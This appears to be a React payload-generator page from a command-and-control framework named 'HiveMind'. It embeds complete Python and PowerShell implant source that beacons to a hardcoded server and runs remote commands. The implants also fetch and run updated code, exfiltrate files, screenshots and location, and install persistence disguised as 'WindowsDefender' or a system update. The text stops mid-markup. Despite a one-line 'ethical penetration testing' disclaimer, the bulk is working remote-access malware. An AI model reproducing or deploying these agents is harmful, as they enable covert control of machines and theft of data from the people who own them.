import React, { useState, useEffect } from 'react';
import { useSelector, useDispatch } from 'react-redux';
import { fetchListeners } from '../store/listenersSlice';

function Payloads() {
  const dispatch = useDispatch();
  const { listeners } = useSelector((state) => state.listeners);
  const C2_SERVER = 'hivemind.ciphercortex.com';
  
  const [config, setConfig] = useState({
    listener_id: '',
    platform: 'python',
    beacon_interval: 300,
    jitter: 20
  });
  const [generatedPayload, setGeneratedPayload] = useState(null);
  const [loading, setLoading] = useState(false);

  useEffect(() => {
    dispatch(fetchListeners());
  }, [dispatch]);

  const generatePayload = async () => {
    setLoading(true);
    try {
      const listener = listeners.find(l => l.listener_id === config.listener_id);
      const port = listener?.bind_port || 443;
      const protocol = listener?.listener_type || 'https';
      const useSSL = protocol === 'https';
      
      let payload;
      switch (config.platform) {
        case 'powershell':
          payload = generatePowerShellAgent(C2_SERVER, port, useSSL, config.beacon_interval, config.jitter);
          break;
        case 'python':
        default:
          payload = generatePythonAgent(C2_SERVER, port, useSSL, config.beacon_interval, config.jitter);
          break;
      }
      setGeneratedPayload(payload);
    } catch (error) {
      console.error('Failed to generate payload:', error);
    } finally {
      setLoading(false);
    }
  };

  const generatePythonAgent = (server, port, useSSL, interval, jitter) => {
    return `#!/usr/bin/env python3
"""

"""

import os, sys, socket, platform, subprocess, time, random, json, signal, logging
import urllib.request, urllib.error, ssl, uuid

# Configuration
C2_SERVER = "${useSSL ? 'https' : 'http'}://${server}:${port}"
BEACON_INTERVAL = ${interval}
JITTER = ${jitter}
AGENT_VERSION = "1.2.0"
AGENT_TYPE = "python"
MAX_BACKOFF = 3600  # Max 1 hour between retries
RUNNING = True
AGENT_ID_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".hivemind_agent_id")

def load_agent_id():
    try:
        with open(AGENT_ID_FILE, "r", encoding="utf-8") as handle:
            stored = handle.read().strip()
            if stored:
                return stored
    except FileNotFoundError:
        pass
    except Exception:
        pass
    return str(uuid.uuid4())

def save_agent_id(agent_id):
    try:
        with open(AGENT_ID_FILE, "w", encoding="utf-8") as handle:
            handle.write(agent_id)
    except Exception as exc:
        log.warning(f"Could not persist agent id: {exc}")

# Setup logging to stdout/stderr (systemd captures this)
logging.basicConfig(
    level=logging.INFO,
    format='[%(asctime)s] %(levelname)s: %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S',
    handlers=[logging.StreamHandler(sys.stdout)]
)
log = logging.getLogger('hivemind')
AGENT_ID = load_agent_id()

ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE

def signal_handler(signum, frame):
    """Handle SIGTERM/SIGINT for clean shutdown"""
    global RUNNING
    sig_name = signal.Signals(signum).name
    log.info(f"Received {sig_name}, shutting down gracefully...")
    RUNNING = False

# Register signal handlers
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)

def get_external_ip():
    """Fetch external IP from public services"""
    services = [
        "https://api.ipify.org?format=json",
        "https://ifconfig.me/ip",
        "https://icanhazip.com"
    ]
    for svc in services:
        try:
            req = urllib.request.Request(svc, headers={"User-Agent": "curl/7.68.0"})
            resp = urllib.request.urlopen(req, context=ssl_context, timeout=5)
            data = resp.read().decode().strip()
            if "ipify" in svc:
                return json.loads(data).get("ip")
            return data
        except:
            continue
    return None

def get_internal_ip():
    """Get best internal IP (not loopback)"""
    try:
        # Connect to external address to find default route IP
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
        s.close()
        return ip
    except:
        try:
            return socket.gethostbyname(socket.gethostname())
        except:
            return "unknown"

def get_system_info():
    log.info("Gathering system info...")
    
    # Get IPs
    internal_ip = get_internal_ip()
    external_ip = get_external_ip()
    log.info(f"Internal IP: {internal_ip}, External IP: {external_ip}")
    
    return {
        "agent_id": AGENT_ID,
        "hostname": socket.gethostname(),
        "username": os.getenv("USER") or os.getenv("USERNAME") or "unknown",
        "os_type": platform.system().lower(),
        "os_version": platform.release(),
        "architecture": platform.machine(),
        "internal_ip": internal_ip,
        "external_ip": external_ip,
        "process_id": os.getpid(),
        "process_name": sys.argv[0],
        "is_elevated": os.geteuid() == 0 if hasattr(os, 'geteuid') else False,
        "beacon_interval": BEACON_INTERVAL,
        "jitter": JITTER,
        "agent_version": AGENT_VERSION,
        "agent_type": AGENT_TYPE
    }

def beacon_payload():
    return {
        "agent_id": AGENT_ID,
        "hostname": socket.gethostname(),
        "username": os.getenv("USER") or os.getenv("USERNAME") or "unknown",
        "internal_ip": get_internal_ip(),
        "agent_version": AGENT_VERSION,
    }

def make_request(url, data=None, retries=3):
    """Make HTTP request with exponential backoff retry"""
    backoff = 5
    for attempt in range(retries):
        try:
            headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/json"}
            encoded_data = json.dumps(data).encode() if data else None
            req = urllib.request.Request(url, data=encoded_data, headers=headers)
            resp = urllib.request.urlopen(req, context=ssl_context, timeout=30)
            return json.loads(resp.read().decode())
        except urllib.error.HTTPError as e:
            try:
                body = json.loads(e.read().decode() or "{}")
            except Exception:
                body = {}
            return {"__http_error__": True, "status": e.code, **body}
        except urllib.error.URLError as e:
            log.warning(f"Request failed (attempt {attempt + 1}/{retries}): {e.reason}")
        except Exception as e:
            log.warning(f"Request error (attempt {attempt + 1}/{retries}): {e}")
        
        if attempt < retries - 1:
            sleep_time = min(backoff * (2 ** attempt), MAX_BACKOFF)
            log.info(f"Retrying in {sleep_time}s...")
            time.sleep(sleep_time)
    return None

def register_agent():
    global AGENT_ID, BEACON_INTERVAL, JITTER
    resp = make_request(f"{C2_SERVER}/api/callback/register", get_system_info())
    if resp and not resp.get("__http_error__"):
        AGENT_ID = resp.get("agent_id", AGENT_ID)
        save_agent_id(AGENT_ID)
        BEACON_INTERVAL = resp.get("beacon_interval", BEACON_INTERVAL)
        JITTER = resp.get("jitter", JITTER)
        log.info(f"Registration successful! Agent ID: {AGENT_ID}")
        return True
    log.warning("Registration failed")
    return False

def execute_shell(cmd):
    try:
        log.info(f"Executing: {cmd}")
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=120)
        output = result.stdout + result.stderr or "(no output)"
        log.info(f"Command completed, output length: {len(output)}")
        return output
    except subprocess.TimeoutExpired:
        log.error(f"Command timed out: {cmd}")
        return "(error: command timed out after 120s)"
    except Exception as e:
        log.error(f"Command failed: {e}")
        return f"(error: {str(e)})"

def get_process_list():
    """Get list of running processes"""
    try:
        if platform.system() == "Windows":
            result = subprocess.run("tasklist /FO CSV /NH", shell=True, capture_output=True, text=True)
            return result.stdout
        else:
            result = subprocess.run("ps aux --no-headers", shell=True, capture_output=True, text=True)
            return result.stdout
    except Exception as e:
        return f"Error: {e}"

def kill_process(pid):
    """Kill a process by PID"""
    try:
        if not pid:
            return "Error: No PID specified"
        if platform.system() == "Windows":
            result = subprocess.run(f"taskkill /PID {pid} /F", shell=True, capture_output=True, text=True)
        else:
            result = subprocess.run(f"kill -9 {pid}", shell=True, capture_output=True, text=True)
        return result.stdout + result.stderr or f"Process {pid} killed"
    except Exception as e:
        return f"Error: {e}"

def install_persistence(method):
    """Install persistence mechanism"""
    try:
        if platform.system() == "Windows":
            agent_path = os.path.abspath(sys.argv[0])
            if method == "registry":
                cmd = f'reg add "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" /v "WindowsDefender" /t REG_SZ /d "{agent_path}" /f'
            elif method == "scheduled_task":
                cmd = f'schtasks /create /tn "WindowsDefender" /tr "{agent_path}" /sc onlogon /rl highest /f'
            else:
                return f"Unknown persistence method for Windows: {method}"
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            return result.stdout + result.stderr or f"Persistence installed via {method}"
        else:
            agent_path = os.path.abspath(sys.argv[0])
            if method == "cron":
                cmd = f'(crontab -l 2>/dev/null; echo "@reboot {agent_path}") | crontab -'
            elif method == "bashrc":
                with open(os.path.expanduser("~/.bashrc"), "a") as f:
                    f.write(f"\\n# System update\\nnohup {agent_path} &>/dev/null &\\n")
                return "Persistence installed via bashrc"
            elif method == "service":
                service_content = f'''[Unit]
Description=System Service
After=network.target

[Service]
ExecStart={agent_path}
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target'''
                with open("/tmp/sysupdate.service", "w") as f:
                    f.write(service_content)
                subprocess.run("sudo cp /tmp/sysupdate.service /etc/systemd/system/", shell=True)
                subprocess.run("sudo systemctl enable sysupdate.service", shell=True)
                return "Persistence installed via systemd service"
            else:
                return f"Unknown persistence method for Linux: {method}"
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            return result.stdout + result.stderr or f"Persistence installed via {method}"
    except Exception as e:
        return f"Error: {e}"

def get_health_metrics():
    """Get system health metrics"""
    try:
        metrics = {}
        if platform.system() == "Windows":
            # CPU
            cpu_result = subprocess.run('wmic cpu get loadpercentage /value', shell=True, capture_output=True, text=True)
            for line in cpu_result.stdout.split("\\n"):
                if "LoadPercentage" in line:
                    metrics["cpu"] = float(line.split("=")[1].strip())
            # Memory
            mem_result = subprocess.run('wmic OS get FreePhysicalMemory,TotalVisibleMemorySize /Value', shell=True, capture_output=True, text=True)
            total = free = 0
            for line in mem_result.stdout.split("\\n"):
                if "TotalVisibleMemorySize" in line:
                    total = int(line.split("=")[1].strip())
                if "FreePhysicalMemory" in line:
                    free = int(line.split("=")[1].strip())
            if total > 0:
                metrics["memory"] = round((1 - free/total) * 100, 1)
        else:
            # CPU - use /proc/loadavg
            with open("/proc/loadavg") as f:
                load = float(f.read().split()[0])
                cpu_count = os.cpu_count() or 1
                metrics["cpu"] = min(round(load / cpu_count * 100, 1), 100)
            # Memory
            with open("/proc/meminfo") as f:
                meminfo = {}
                for line in f:
                    parts = line.split()
                    if len(parts) >= 2:
                        meminfo[parts[0].rstrip(":")] = int(parts[1])
                total = meminfo.get("MemTotal", 1)
                available = meminfo.get("MemAvailable", meminfo.get("MemFree", 0))
                metrics["memory"] = round((1 - available/total) * 100, 1)
            # Disk
            stat = os.statvfs("/")
            total = stat.f_blocks * stat.f_frsize
            free = stat.f_bavail * stat.f_frsize
            metrics["disk"] = round((1 - free/total) * 100, 1)
        return json.dumps(metrics)
    except Exception as e:
        return f"Error: {e}"

def self_update(params):
    """Self-update the agent with new code from C2"""
    global AGENT_VERSION
    try:
        target_version = params.get("target_version", AGENT_VERSION)
        log.info(f"Self-update requested: {AGENT_VERSION} -> {target_version}")
        
        # Download new agent code from C2
        update_url = f"{C2_SERVER}/api/agents/code/{params.get('agent_type', 'python')}"
        req = urllib.request.Request(update_url, headers={"User-Agent": "Mozilla/5.0"})
        resp = urllib.request.urlopen(req, context=ssl_context, timeout=30)
        new_code = resp.read().decode()
        
        if not new_code or len(new_code) < 100:
            return f"Error: Invalid update payload received"
        
        # Get current script path
        script_path = os.path.abspath(sys.argv[0])
        backup_path = script_path + ".bak"
        
        # Backup current script
        import shutil
        shutil.copy2(script_path, backup_path)
        log.info(f"Backed up current agent to {backup_path}")
        
        # Write new code
        with open(script_path, 'w') as f:
            f.write(new_code)
        log.info(f"Updated agent to version {target_version}")
        
        # Report success before restarting
        AGENT_VERSION = target_version
        
        # Restart agent (exec replaces current process)
        log.info("Restarting agent with new code...")
        os.execv(sys.executable, [sys.executable, script_path])
        
        return f"Updated to {target_version}"  # Won't reach here if exec succeeds
    except Exception as e:
        log.error(f"Self-update failed: {e}")
        return f"Update failed: {e}"

def main():
    global BEACON_INTERVAL, JITTER, AGENT_ID, RUNNING
    
    log.info("HiveMind Agent starting...")
    log.info(f"C2 Server: {C2_SERVER}")
    log.info(f"PID: {os.getpid()}")
    
    # Registration with exponential backoff
    backoff = BEACON_INTERVAL
    while RUNNING:
        log.info("Attempting registration...")
        if register_agent():
            log.info(f"Beacon interval: {BEACON_INTERVAL}s, Jitter: {JITTER}%")
            break
        
        log.warning(f"Registration failed, retrying in {backoff}s...")
        time.sleep(backoff)
        backoff = min(backoff * 2, MAX_BACKOFF)  # Exponential backoff
    
    # Beacon loop
    consecutive_failures = 0
    while RUNNING:
        try:
            resp = make_request(f"{C2_SERVER}/api/callback/beacon", beacon_payload())
            if resp and resp.get("__http_error__"):
                if resp.get("register"):
                    log.warning("Server requested re-registration")
                    register_agent()
                resp = None
            if resp:
                consecutive_failures = 0  # Reset on success
                tasks = resp.get("tasks", [])
                if tasks:
                    log.info(f"Received {len(tasks)} task(s)")
                
                for task in tasks:
                    if not RUNNING:
                        break
                    
                    result = None
                    task_type = task.get("type", "shell")
                    
                    task_success = True
                    if task_type == "shell":
                        result = execute_shell(task["command"])
                    elif task_type == "exit":
                        log.info("Received exit command")
                        RUNNING = False
                        break
                    elif task_type == "process_list":
                        result = get_process_list()
                    elif task_type == "process_kill":
                        result = kill_process(task.get("parameters", {}).get("pid"))
                    elif task_type == "persist":
                        result = install_persistence(task.get("parameters", {}).get("method", "cron"))
                    elif task_type == "health":
                        result = get_health_metrics()
                    elif task_type == "self_update":
                        result = self_update(task.get("parameters", {}))
                        task_success = bool(result and not str(result).lower().startswith("error") and "failed" not in str(result).lower())
                    
                    if result is not None:
                        make_request(f"{C2_SERVER}/api/callback/result", {
                            "task_id": task["task_id"],
                            "success": task_success,
                            "result": result
                        })
            else:
                consecutive_failures += 1
                log.warning(f"Beacon failed ({consecutive_failures} consecutive)")
        except Exception as e:
            consecutive_failures += 1
            log.error(f"Beacon loop error: {e}")
        
        if not RUNNING:
            break
        
        # Calculate sleep with jitter and backoff for failures
        jitter_range = BEACON_INTERVAL * (JITTER / 100)
        base_sleep = BEACON_INTERVAL + random.uniform(-jitter_range, jitter_range)
        
        # Apply backoff if we're having connection issues
        if consecutive_failures > 0:
            backoff_multiplier = min(2 ** consecutive_failures, 32)
            sleep_time = min(base_sleep * backoff_multiplier, MAX_BACKOFF)
            log.info(f"Sleeping {sleep_time:.0f}s (backoff due to failures)")
        else:
            sleep_time = base_sleep
        
        time.sleep(sleep_time)
    
    log.info("Agent shutdown complete")

if __name__ == "__main__":
    main()`;
  };

  const generatePowerShellAgent = (server, port, useSSL, interval, jitter) => {
    const protocol = useSSL ? 'https' : 'http';
    return `<#
.SYNOPSIS
    HiveMind Agent - PowerShell Stager
    FOR ETHICAL PENETRATION TESTING ONLY

.DESCRIPTION
    This script establishes a connection to a HiveMind C2 server
    and executes commands received from the server.
#>

# Configuration
$C2Server = "${protocol}://${server}:${port}"
$BeaconInterval = ${interval}
$Jitter = ${jitter}
$AgentVersion = "1.2.0"
$AgentType = "powershell"
$AgentIdFile = Join-Path $env:LOCALAPPDATA "hivemind_agent_id"

function Get-StoredAgentId {
    if (Test-Path $AgentIdFile) {
        $stored = (Get-Content $AgentIdFile -Raw).Trim()
        if ($stored) { return $stored }
    }
    return [guid]::NewGuid().ToString()
}

function Save-AgentId {
    param([string]$AgentId)
    try {
        Set-Content -Path $AgentIdFile -Value $AgentId -NoNewline
    } catch {
        Write-Host "[WARN] Could not persist agent id: $($_.Exception.Message)" -ForegroundColor Yellow
    }
}

$AgentId = Get-StoredAgentId

# Bypass SSL certificate validation for self-signed certs
if ($${useSSL}) {
    add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
    public bool CheckValidationResult(ServicePoint sp, X509Certificate cert, WebRequest req, int problem) { return true; }
}
"@
    [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
}

function Get-SystemInfo {
    $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    
    # Get best internal IP (prefer non-APIPA, non-loopback)
    $internalIP = $null
    try {
        $ips = Get-NetIPAddress -AddressFamily IPv4 | Where-Object { 
            $_.InterfaceAlias -notlike "*Loopback*" -and 
            $_.IPAddress -notlike "169.254.*" -and
            $_.IPAddress -notlike "127.*"
        } | Sort-Object -Property InterfaceMetric
        if ($ips) { $internalIP = $ips[0].IPAddress }
    } catch {
        try { $internalIP = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString } catch {}
    }
    if (-not $internalIP) { $internalIP = "unknown" }
    
    # Get external IP
    $externalIP = $null
    try {
        $externalIP = (Invoke-RestMethod -Uri "https://api.ipify.org?format=json" -TimeoutSec 5).ip
    } catch {
        try { $externalIP = (Invoke-RestMethod -Uri "https://ifconfig.me/ip" -TimeoutSec 5).Trim() } catch {}
    }
    
    # Get GPS location using Windows Location Services
    $latitude = $null
    $longitude = $null
    try {
        Add-Type -AssemblyName System.Device
        $geoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher
        $geoWatcher.Start()
        
        # Wait up to 10 seconds for location
        $timeout = 10
        while (($geoWatcher.Status -ne 'Ready') -and ($timeout -gt 0)) {
            Start-Sleep -Milliseconds 500
            $timeout -= 0.5
        }
        
        if ($geoWatcher.Position.Location.IsUnknown -eq $false) {
            $latitude = $geoWatcher.Position.Location.Latitude
            $longitude = $geoWatcher.Position.Location.Longitude
        }
        $geoWatcher.Stop()
    } catch {
        # Location services not available or access denied
    }
    
    $info = @{
        agent_id = $AgentId
        hostname = $env:COMPUTERNAME
        username = $env:USERNAME
        os_type = "windows"
        os_version = [System.Environment]::OSVersion.Version.ToString()
        architecture = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }
        internal_ip = $internalIP
        external_ip = $externalIP
        process_id = $PID
        process_name = (Get-Process -Id $PID).ProcessName
        is_elevated = $isAdmin
        integrity_level = if ($isAdmin) { "High" } else { "Medium" }
        domain = $env:USERDOMAIN
        agent_version = $AgentVersion
        agent_type = $AgentType
    }
    
    # Add location if available
    if ($latitude -and $longitude) {
        $info['latitude'] = $latitude
        $info['longitude'] = $longitude
    }
    
    return $info
}

function Invoke-C2Request {
    param([string]$Endpoint, [hashtable]$Data = $null)
    
    try {
        $uri = "$C2Server$Endpoint"
        $headers = @{
            "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
            "Content-Type" = "application/json"
        }
        
        if ($Data) {
            $body = $Data | ConvertTo-Json -Depth 10 -Compress
            $response = Invoke-RestMethod -Uri $uri -Method Post -Headers $headers -Body $body -TimeoutSec 30
        } else {
            $response = Invoke-RestMethod -Uri $uri -Method Get -Headers $headers -TimeoutSec 30
        }
        return $response
    } catch {
        $status = $null
        $register = $false
        if ($_.Exception.Response) {
            $status = [int]$_.Exception.Response.StatusCode
            try {
                $reader = New-Object System.IO.StreamReader($_.Exception.Response.GetResponseStream())
                $raw = $reader.ReadToEnd()
                $parsed = $raw | ConvertFrom-Json
                if ($parsed.register) { $register = $true }
            } catch {}
        }
        if ($register) {
            return @{ __http_error__ = $true; status = $status; register = $true }
        }
        Write-Host "[ERROR] C2 Request failed: $($_.Exception.Message)" -ForegroundColor Red
        return $null
    }
}

function Register-Agent {
    $sysInfo = Get-SystemInfo
    $response = Invoke-C2Request -Endpoint "/api/callback/register" -Data $sysInfo
    if ($response -and -not $response.__http_error__) {
        if ($response.agent_id) {
            $script:AgentId = $response.agent_id
            Save-AgentId $script:AgentId
            Write-Host "[+] Agent ID: $($response.agent_id)" -ForegroundColor Green
        }
        if ($response.beacon_interval) { $script:BeaconInterval = $response.beacon_interval }
        if ($response.jitter) { $script:Jitter = $response.jitter }
        return $true
    }
    return $false
}

function Get-BeaconPayload {
    $info = Get-SystemInfo
    return @{
        agent_id = $AgentId
        hostname = $info.hostname
        username = $info.username
        internal_ip = $info.internal_ip
        agent_version = $AgentVersion
    }
}

function Invoke-ShellCommand {
    param([string]$Command)
    
    try {
        $output = Invoke-Expression $Command 2>&1 | Out-String
        if ([string]::IsNullOrEmpty($output)) { $output = "(no output)" }
        return $output.Trim()
    } catch {
        return "(error: $($_.Exception.Message))"
    }
}

function Start-Agent {
    Write-Host "[*] HiveMind Agent Starting..." -ForegroundColor Cyan
    Write-Host "[*] C2 Server: $C2Server" -ForegroundColor Cyan
    
    # Registration loop
    while ($true) {
        Write-Host "[*] Gathering system info..." -ForegroundColor Yellow
        Write-Host "[*] Registering with C2..." -ForegroundColor Yellow
        if (Register-Agent) {
            Write-Host "[+] Registration successful!" -ForegroundColor Green
            break
        }
        Write-Host "[-] Registration failed, retrying in $BeaconInterval seconds..." -ForegroundColor Red
        Start-Sleep -Seconds $BeaconInterval
    }
    
    # Beacon loop
    while ($true) {
        try {
            $response = Invoke-C2Request -Endpoint "/api/callback/beacon" -Data (Get-BeaconPayload)
            if ($response -and $response.__http_error__ -and $response.register) {
                Write-Host "[*] Server requested re-registration" -ForegroundColor Yellow
                Register-Agent | Out-Null
                continue
            }
            
            if ($response -and $response.tasks) {
                foreach ($task in $response.tasks) {
                    $result = $null
                    
                    switch ($task.type) {
                        "shell" {
                            $result = Invoke-ShellCommand -Command $task.command
                        }
                        "powershell" {
                            $result = Invoke-ShellCommand -Command $task.command
                        }
                        "download" {
                            # Download file from target to C2
                            try {
                                $fileBytes = [System.IO.File]::ReadAllBytes($task.path)
                                $result = [Convert]::ToBase64String($fileBytes)
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "upload" {
                            # Upload file from C2 to target
                            try {
                                $fileBytes = [Convert]::FromBase64String($task.content)
                                [System.IO.File]::WriteAllBytes($task.path, $fileBytes)
                                $result = "File uploaded to $($task.path)"
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "screenshot" {
                            try {
                                Add-Type -AssemblyName System.Windows.Forms
                                $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
                                $bitmap = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height)
                                $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
                                $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size)
                                $ms = New-Object System.IO.MemoryStream
                                $bitmap.Save($ms, [System.Drawing.Imaging.ImageFormat]::Png)
                                $result = [Convert]::ToBase64String($ms.ToArray())
                                $graphics.Dispose()
                                $bitmap.Dispose()
                                $ms.Dispose()
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "process_list" {
                            try {
                                $procs = Get-Process | Select-Object Id, Name, CPU, @{N='Mem';E={[math]::Round($_.WorkingSet64/1MB,1)}}, @{N='User';E={try{$_.GetOwner().User}catch{'N/A'}}} | ConvertTo-Json -Compress
                                $result = $procs
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "process_kill" {
                            try {
                                $pid = $task.parameters.pid
                                Stop-Process -Id $pid -Force
                                $result = "Process $pid killed"
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "persist" {
                            try {
                                $method = $task.parameters.method
                                $agentPath = $MyInvocation.MyCommand.Path
                                if (-not $agentPath) { $agentPath = [Environment]::GetCommandLineArgs()[0] }
                                
                                switch ($method) {
                                    "registry" {
                                        Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "WindowsDefender" -Value $agentPath
                                        $result = "Persistence installed via Registry"
                                    }
                                    "startup" {
                                        $startupPath = [Environment]::GetFolderPath('Startup')
                                        Copy-Item $agentPath -Destination "$startupPath\\WindowsDefender.ps1" -Force
                                        $result = "Persistence installed via Startup Folder"
                                    }
                                    "scheduled_task" {
                                        $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -File \`"$agentPath\`""
                                        $trigger = New-ScheduledTaskTrigger -AtLogOn
                                        Register-ScheduledTask -TaskName "WindowsDefender" -Action $action -Trigger $trigger -RunLevel Highest -Force
                                        $result = "Persistence installed via Scheduled Task"
                                    }
                                    default {
                                        $result = "Unknown persistence method: $method"
                                    }
                                }
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "persist_remove" {
                            try {
                                Remove-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "WindowsDefender" -ErrorAction SilentlyContinue
                                Remove-Item "$([Environment]::GetFolderPath('Startup'))\\WindowsDefender.ps1" -Force -ErrorAction SilentlyContinue
                                Unregister-ScheduledTask -TaskName "WindowsDefender" -Confirm:$false -ErrorAction SilentlyContinue
                                $result = "All persistence mechanisms removed"
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "health" {
                            try {
                                $cpu = (Get-Counter '\\Processor(_Total)\\% Processor Time' -ErrorAction SilentlyContinue).CounterSamples[0].CookedValue
                                $mem = Get-CimInstance Win32_OperatingSystem
                                $memPercent = [math]::Round(($mem.TotalVisibleMemorySize - $mem.FreePhysicalMemory) / $mem.TotalVisibleMemorySize * 100, 1)
                                $disk = Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='C:'"
                                $diskPercent = [math]::Round(($disk.Size - $disk.FreeSpace) / $disk.Size * 100, 1)
                                $result = @{ cpu = [math]::Round($cpu, 1); memory = $memPercent; disk = $diskPercent } | ConvertTo-Json -Compress
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "self_update" {
                            try {
                                $targetVersion = $task.parameters.target_version
                                Write-Host "[*] Self-update requested: $AgentVersion -> $targetVersion" -ForegroundColor Yellow
                                
                                # Download new agent code
                                $updateUrl = "$C2Server/api/agents/code/powershell"
                                $newCode = Invoke-RestMethod -Uri $updateUrl -TimeoutSec 30
                                
                                if ($newCode -and $newCode.Length -gt 100) {
                                    # Get script path
                                    $scriptPath = $MyInvocation.MyCommand.Path
                                    if (-not $scriptPath) { $scriptPath = [Environment]::GetCommandLineArgs()[0] }
                                    
                                    # Backup current script
                                    Copy-Item $scriptPath -Destination "$scriptPath.bak" -Force
                                    
                                    # Write new code
                                    $newCode | Out-File -FilePath $scriptPath -Encoding UTF8 -Force
                                    
                                    $result = "Updated to $targetVersion - restarting..."
                                    
                                    # Report success then restart
                                    Invoke-C2Request -Endpoint "/api/callback/result" -Data @{
                                        task_id = $task.task_id
                                        success = $true
                                        result = $result
                                    } | Out-Null
                                    
                                    # Restart agent
                                    Start-Process powershell.exe -ArgumentList "-WindowStyle Hidden -File \`"$scriptPath\`"" -WindowStyle Hidden
                                    exit
                                } else {
                                    $result = "Error: Invalid update payload"
                                }
                            } catch {
                                $result = "(error: $($_.Exception.Message))"
                            }
                        }
                        "exit" {
                            exit
                        }
                    }
                    
                    if ($result) {
                        Invoke-C2Request -Endpoint "/api/callback/result" -Data @{
                            task_id = $task.task_id
                            success = $true
                            result = $result
                        } | Out-Null
                    }
                }
            }
        } catch {
            # Silent fail, continue beaconing
        }
        
        # Calculate sleep with jitter
        $jitterRange = $BeaconInterval * ($Jitter / 100)
        $sleepTime = $BeaconInterval + (Get-Random -Minimum (-$jitterRange) -Maximum $jitterRange)
        Start-Sleep -Seconds ([Math]::Max(1, $sleepTime))
    }
}

# Run the agent
Start-Agent
`;
  };

  const copyToClipboard = () => {
    navigator.clipboard.writeText(generatedPayload);
  };

  const downloadPayload = () => {
    let filename, mimeType;
    
    switch (config.platform) {
      case 'powershell':
        filename = 'hivemind_agent.ps1';
        mimeType = 'text/plain';
        break;
      case 'python':
      default:
        filename = 'hivemind_agent.py';
        mimeType = 'text/x-python';
        break;
    }
    
    const blob = new Blob([generatedPayload], { type: mimeType });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = filename;
    a.click();
    URL.revokeObjectURL(url);
  };

  const getFileExtension = () => {
    switch (config.platform) {
      case 'powershell': return '.ps1';
      case 'python': return '.py';
      default: return '.txt';
    }
  };

  const getListener = () => listeners.find(l => l.listener_id === config.listener_id);

  return (
    <>
      <header className="main-header">
        <h1 className="page-title">Payload Generator</h1>
      </header>

      <div className="main-body">
        <div style={{ display: 'grid', gridTemplateColumns: '400px 1fr', gap: 'var(--spacing-xl)' }}>
          {/* Configuration */}
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">Configuration</h3>
            </div>
            <div className="card-body">
              <div className="form-group">
                <label className="form-label">Listener</label>
                <select
                  className="form-select"
                  value={config.listener_id}
                  onChange={(e) => setConfig({ ...config, listener_id: e.target.value })}
                >
                  <option value="">Select a listener...</option>
                  {listeners.map(l => (
                    <option key={l.listener_id} value={l.listener_id}>
                      {l.name} ({l.listener_type}://{l.bind_address}:{l.bind_port})
                    </option>
                  ))}
                </select>
              </div>

              <div className="form-group">
                <label className="form-label">Platform Server</label>
                <div style={{
                  padding: 'var(--spacing-md)',
                  background: 'var(--bg-primary)',
                  border: '1px solid var(--border-color)',
                  borderRadius: 'var(--radius-sm)',
                  color: 'var(--neon-green)',
                  fontFamily: 'var(--font-mono)'
                }}>
                  {C2_SERVER}
                </div>
              </div>

              <div className="form-group">
                <label className="form-label">Platform</label>
                <select
                  className="form-select"
                  value={config.platform}
                  onChange={(e) => setConfig({ ...config, platform: e.target.value })}
                >
                  <option value="python">🐧 Python (Linux/macOS/Windows)</option>
                  <option value="powershell">🪟 PowerShell (Windows)</option>
                </select>
              </div>

              {/* Platform-specific info */}
              <div style={{ 
                padding: 'var(--spacing-md)', 
                background: 'var(--bg-primary)', 
                borderRadius: 'var(--radius-sm)',
                marginBottom: 'var(--spacing-md)',
                fontSize: '12px',
                color: 'var(--text-secondary)'
              }}>
                {config.platform === 'python' && (
                  <>
                    <strong style={{ color: 'var(--neon-cyan)' }}>Python Agent</strong>
                    <p style={{ margin: '8px 0 0 0' }}>
                      Cross-platform agent. Requires Python 3 installed on target.
                      Best for Linux, macOS, and Windows with Python.
                    </p>
                  </>
                )}
                {config.platform === 'powershell' && (
                  <>
